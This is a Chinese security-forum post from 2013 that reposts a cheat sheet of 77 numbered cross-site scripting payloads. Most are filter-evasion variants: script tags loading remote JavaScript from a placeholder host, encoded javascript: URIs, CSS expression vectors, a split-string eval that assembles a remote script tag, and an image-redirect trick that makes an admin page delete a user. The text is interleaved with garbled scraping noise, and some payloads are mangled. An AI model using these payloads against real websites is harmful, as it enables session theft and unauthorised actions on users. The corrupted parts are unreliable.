找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2728|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
( p7 c6 Z- n9 W6 I(1)普通的XSS JavaScript注入- P: t' s( m) {# V/ [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ `3 R- U5 E3 t7 R: _(2)IMG标签XSS使用JavaScript命令! U0 Y4 s0 I9 l$ B0 |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
  M# A4 U  C4 v7 X  M* y5 \8 ~5 a) b(3)IMG标签无分号无引号
: Y7 P+ P6 G6 P8 n! `& R. W. i<IMG SRC=javascript:alert(‘XSS’)>
1 D8 h  ?. H8 T* ?4 n3 T(4)IMG标签大小写不敏感; h3 S4 e4 o8 \8 \+ B
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( B& [% ^6 J3 H3 c1 L(5)HTML编码(必须有分号)
( f, a7 a) g- j7 d  \( S% T) e<IMG SRC=javascript:alert(“XSS”)>
8 l* K2 ]9 }/ {0 T6 |0 a% s/ D(6)修正缺陷IMG标签" H- O8 I) v3 E2 g: J3 G! ?$ Y
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
( X2 O3 X* E' \$ ^3 ]5 x2 t+ W0 q) o1 ^2 Q% J/ J1 Z$ r4 O

; X/ a; y' v, m; r' B(7)formCharCode标签(计算器)
% q8 ^& p: |7 S1 B8 G! X! m<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 C( j- U- a1 \! D4 I0 w8 F(8)UTF-8的Unicode编码(计算器)4 j/ O% m% {% L7 L5 m. T) z
<IMG SRC=jav..省略..S')>: e3 D# ~. J, f/ x. Y9 T
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 J$ \* [9 q% ?9 I6 U" W/ [* _<IMG SRC=jav..省略..S')>
% ~" G( B( U4 h6 w: }(10)十六进制编码也是没有分号(计算器)
/ X, S$ X% O  Z* D6 k3 t<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>" _: C/ l- E# Q: N; d$ B8 d
(11)嵌入式标签,将Javascript分开2 C6 Z! G4 t) J9 W" ^% H; T& Q" e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% E$ g( _* o) E  f7 i% T0 h( T( }(12)嵌入式编码标签,将Javascript分开
% H+ y) u0 x$ o2 J1 }& `<IMG SRC=”jav ascript:alert(‘XSS’);”>  G5 \/ {% N' ^
(13)嵌入式换行符
2 k+ Y4 v6 M  _) P8 z<IMG SRC=”jav ascript:alert(‘XSS’);”>) j. \) f7 R! g- s! q
(14)嵌入式回车3 n1 y( b' c1 l, F
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" _& I0 w$ _( ?  ~(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ e: E% \! p. ~0 g: W# G
<IMG SRC=”javascript:alert(‘XSS‘)”>& T4 `: a" \, I0 c" b9 O! E
(16)解决限制字符(要求同页面)
+ E: l; G1 `9 j+ Q! F4 d  N<script>z=’document.’</script>/ _& B. k# y+ m5 J4 G5 y1 r# [
<script>z=z+’write(“‘</script>  N; D- S6 C- C) B3 V- |; a+ c
<script>z=z+’<script’</script>1 w2 _( k# V1 q8 v, C% e
<script>z=z+’ src=ht’</script>+ A+ B3 @, q1 I$ S, E
<script>z=z+’tp://ww’</script>
0 i5 x* P3 l& Z+ B<script>z=z+’w.shell’</script>4 m( K" f2 k+ V& J' P# m
<script>z=z+’.net/1.’</script>$ s# `% \; A* h7 a) o' ^
<script>z=z+’js></sc’</script>- Z- R( v! F* E  Z3 D" P! Y
<script>z=z+’ript>”)’</script>
2 X  U7 y% W3 D  ^1 a<script>eval_r(z)</script>
2 }& R6 e' q$ x# {(17)空字符12-7-1 T00LS - Powered by Discuz! Board9 j" V- T: ]" o* H+ C
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
  W/ n' a2 L  E. W; h0 Pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ m# B1 J9 t% W! s4 l1 ]( h5 ?
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
$ a" F1 X. D0 Vperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ k- ?6 A% M4 m. p, }(19)Spaces和meta前的IMG标签1 y! o5 ^% U$ D' ]6 `! l
<IMG SRC=” javascript:alert(‘XSS’);”>
7 }3 F! B0 C6 V7 ^/ ?& d/ h(20)Non-alpha-non-digit XSS, |+ p+ [5 C8 b/ o( b
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) O2 I9 c- e( v1 q8 n7 Z% Z(21)Non-alpha-non-digit XSS to 2
) `, K8 \0 i& B0 E7 b0 \<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) `9 D# b5 O2 m& K$ m" g& R(22)Non-alpha-non-digit XSS to 3
7 [, n; ]. c) J, o1 L<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" T' o  b2 _1 P- _  X1 z8 A8 d
(23)双开括号
4 Z2 [; y' T3 V7 s: f, ^<<SCRIPT>alert(“XSS”);//<</SCRIPT>  D+ Z3 T/ {, L, w+ u6 [
(24)无结束脚本标记(仅火狐等浏览器)6 l$ m1 E2 P, z9 x- }5 v
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ x9 X, T0 v3 @9 c# B5 n& k+ v(25)无结束脚本标记29 ?2 b( f. B! S; H& t/ z# C
<SCRIPT SRC=//3w.org/XSS/xss.js>
, J: Q& n$ s* [; f5 D(26)半开的HTML/JavaScript XSS  k1 l& T2 Q! g0 F
<IMG SRC=”javascript:alert(‘XSS’)”
. z/ L+ f7 `0 t2 R3 K) {(27)双开角括号
6 \& b4 J1 z: m1 `* ?8 h<iframe src=http://3w.org/XSS.html <
5 a. m2 F) k$ B+ W: I; D; ^(28)无单引号 双引号 分号0 B7 Q: a! l" z2 `/ i* l
<SCRIPT>a=/XSS/4 ~* o# f9 `2 ]2 E& {6 r8 M' n
alert(a.source)</SCRIPT>
7 s/ V0 g1 U! n, {0 n0 J  S9 {% }2 x(29)换码过滤的JavaScript3 ~1 H3 h9 l1 W3 S- {. C
\”;alert(‘XSS’);//4 h9 N; \/ w" t! ?
(30)结束Title标签
! R' ^+ R  y" ~. g7 ?* Z& O</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& v1 @- [! ^" t6 Q: q
(31)Input Image# H( ~2 N& m% n/ v0 k& x
<INPUT SRC=”javascript:alert(‘XSS’);”>5 ?( D5 Q, e/ i7 P/ i
(32)BODY Image
# N/ d' ^# n9 a+ r; n4 o: m! |$ A) W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 R3 n$ X" @& r$ Z
(33)BODY标签( N2 }; E" ?/ c8 i+ r& S* ?. ^
<BODY(‘XSS’)>' a, d! t' D3 r# v% y
(34)IMG Dynsrc
( L: I  i7 r" C1 Z<IMG DYNSRC=”javascript:alert(‘XSS’)”>( h8 ?( n! k' s% I  U1 r' q$ G
(35)IMG Lowsrc/ v9 Y  _5 y1 m2 R: z# x5 m" w
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 p6 N( D4 l. d; `0 @. O(36)BGSOUND
9 ?5 m( X& G% h1 \1 N8 u<BGSOUND SRC=”javascript:alert(‘XSS’);”>
8 z0 d9 y' n5 {& b(37)STYLE sheet
* X- n, D0 f5 v  \<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: y4 B9 ^4 |, _( S2 E" x
(38)远程样式表
6 d  ]+ f! _1 T& f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; {5 D  q2 ^3 N& w. C(39)List-style-image(列表式)5 V6 V$ p, t$ c, g8 v: M8 H
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: o- V# L6 E3 c# S. C(40)IMG VBscript- S1 U7 N% G/ \1 ?  i; X& o
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: d3 `- z) q+ @% b& x8 Z( B1 l
(41)META链接url
# x" j, n4 m9 R  Z, V
. I% |9 P: M2 ?. h6 U2 p% U6 W6 f1 f
+ I, `& g6 k0 g0 x: d<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 l3 d3 y! O. P  S) Z3 Q  AURL=http://;URL=javascript:alert(‘XSS’);”>5 P* j9 a* s6 U
(42)Iframe. A# F" P/ p* K7 t
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>& {: P3 X, ]( p/ X( P
(43)Frame
3 Y) l5 e7 S& x' v/ A; t<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 t6 h0 Q8 D- h% }https://www.t00ls.net/viewthread ... table&tid=15267 3/6
, T% f% m: l; l" O. s! p& I7 v(44)Table/ }, G$ F$ y+ w- z% K1 \7 J
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* {6 p! W0 r* B1 \( J1 l; \(45)TD9 g8 L9 Q- s3 v- w  {4 H2 y9 L
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>7 Z2 S# s- h6 h' Z/ ?7 a0 \( [
(46)DIV background-image
+ l% f7 g1 `9 w3 F1 Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, e8 y9 E4 Q* u9 W2 X3 f# }, w/ P# m
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) X* D$ A2 q  p$ y8&13&12288&65279). @4 ^' }8 ]: P  D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ `2 f: f5 G* {$ A( g
(48)DIV expression# P! f/ }8 N$ {# S- u9 \9 P
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
! Q" P6 T6 C" u1 \(49)STYLE属性分拆表达/ t, d& l" r$ ]2 k. }5 e( S
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ E# R- k. v; ~3 v& x5 \
(50)匿名STYLE(组成:开角号和一个字母开头)( X2 p- Z$ T# f: L9 a
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 W7 D2 m, Y& [- f' Z; g2 P  j(51)STYLE background-image
0 \- B, W# V. i% X( {<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) A# ^4 E7 e1 @4 O* k! I' \
CLASS=XSS></A>- R9 _8 D4 z  t) t; q$ T' r; w
(52)IMG STYLE方式1 u! @( s4 ]; ]5 B6 l
exppression(alert(“XSS”))’>* l/ }7 ?" ?$ Y/ s: s- B% @
(53)STYLE background8 \! A' [! n2 ]4 J
<STYLE><STYLE/ v. C) b0 j- l  B5 B! q/ c6 Q, p
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. g1 d1 T3 u' D6 X8 D2 B(54)BASE
" X. K6 V0 Y) F# H3 R+ R<BASE HREF=”javascript:alert(‘XSS’);//”>- T4 u6 f% P/ B! y) |0 M3 N
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 N& |3 B/ d! V* G; i. F
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>3 Q. j3 Y5 z4 O: K1 y# w5 l4 }% M
(56)在flash中使用ActionScrpt可以混进你XSS的代码, D4 h5 Y7 G- j4 f$ Z
a=”get”;" ~  d4 O4 s1 X$ \) f# m
b=”URL(\”";4 ^* P3 |& l) T4 y$ U
c=”javascript:”;
) K$ p+ T+ D$ M, \* v! ad=”alert(‘XSS’);\”)”;$ M, v9 _% T* ~1 A9 `8 j  X
eval_r(a+b+c+d);/ H/ G  \; C; l8 l* K3 \5 q1 w0 P
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 ?- @' N" \8 M- g* z4 _$ T
<HTML xmlns:xss>' Z% T  s- x  o: B2 b+ G6 ^
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
8 Y+ j, U6 s3 N) p2 t<xss:xss>XSS</xss:xss># M! k9 E) S9 ]( Z" N" I  t
</HTML>
% _5 b1 I( @0 {9 B, z' E(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
! p. W$ w3 s6 ^0 m" h: @<SCRIPT SRC=””></SCRIPT>
0 m+ y0 Y' V8 [  p(59)IMG嵌入式命令,可执行任意命令# c* U( a" ~0 H) I" q+ n7 A' x
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ k0 M$ H0 Q8 ^3 _(60)IMG嵌入式命令(a.jpg在同服务器)
* G# [4 E" Z2 q/ XRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' t& N- X6 l1 V, V(61)绕符号过滤
, T2 J, c7 ^3 f4 ?<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>. Y7 L1 z1 _# U; r
(62)
# h6 b. t% y6 Z+ W3 b. g  |<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* f6 K$ T% J) s- `- [# c6 x7 E
(63)& \* C9 G& a8 e" F* D3 k+ ~7 u
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ }9 h: Y: U0 O1 `
(64)
& _( k5 K( V: r2 J* L# f( T' N$ S<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; t1 Q- G7 P  t7 M  |(65)5 D9 o# y& h4 N" y( V0 d: _" z5 q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>4 j& z0 l/ U4 V  U
(66)12-7-1 T00LS - Powered by Discuz! Board
; s" M$ k' H* A. @8 h. ~https://www.t00ls.net/viewthread ... table&tid=15267 4/6
; Q/ Y- F, [: |# x* R* W<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 ^' X2 d: A5 b0 ^6 q5 ?9 b(67)
& V1 e: O* E; C, U<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
4 Q: c# ?/ t3 p, i5 F! i/ Y</SCRIPT>
$ d) }- G0 ?0 T! a; K(68)URL绕行  h9 Q7 k# F$ R  A
<A HREF=”http://127.0.0.1/”>XSS</A>/ n  D  Z' p8 t3 R% |+ C
(69)URL编码
6 @. T) L) Y* d; `7 E<A HREF=”http://3w.org”>XSS</A>
( N) g) Q. d4 g(70)IP十进制2 h( b) |2 ~  M( N
<A HREF=”http://3232235521″>XSS</A>
$ X& H% K2 C: ~3 Y, H' F- n! [! H(71)IP十六进制$ B0 x& A$ {# @' Q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># I0 f* u( u! H, d
(72)IP八进制# T+ L" V, o0 @0 j
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 e# ]/ k2 w! k( I+ ?(73)混合编码/ U, l! v4 p; T$ K7 z8 o4 m; A# F
<A HREF=”h7 q- _3 I4 |1 d- N5 Q! Z$ V% P* O
tt p://6 6.000146.0×7.147/”">XSS</A>
- c8 B1 [8 m8 H9 P* {(74)节省[http:]
5 W. F- f' w" ~<A HREF=”//www.google.com/”>XSS</A>3 _( n7 j' h4 Y
(75)节省[www]
$ g; k) s6 m4 N<A HREF=”http://google.com/”>XSS</A>
/ J1 I, r# L, e: x9 f(76)绝对点绝对DNS
$ ?# V2 l( E; D<A HREF=”http://www.google.com./”>XSS</A>8 z; K4 C7 J& I1 O; }
(77)javascript链接
8 g! v7 i0 P& |5 m<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
& Q7 s  V; e2 {
7 }3 c, g7 ^$ c+ s1 O* L( |原文地址:http://fuzzexp.org/u/0day/?p=14
" y- k, n  B5 ~
) U1 w1 r, J, I- t5 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表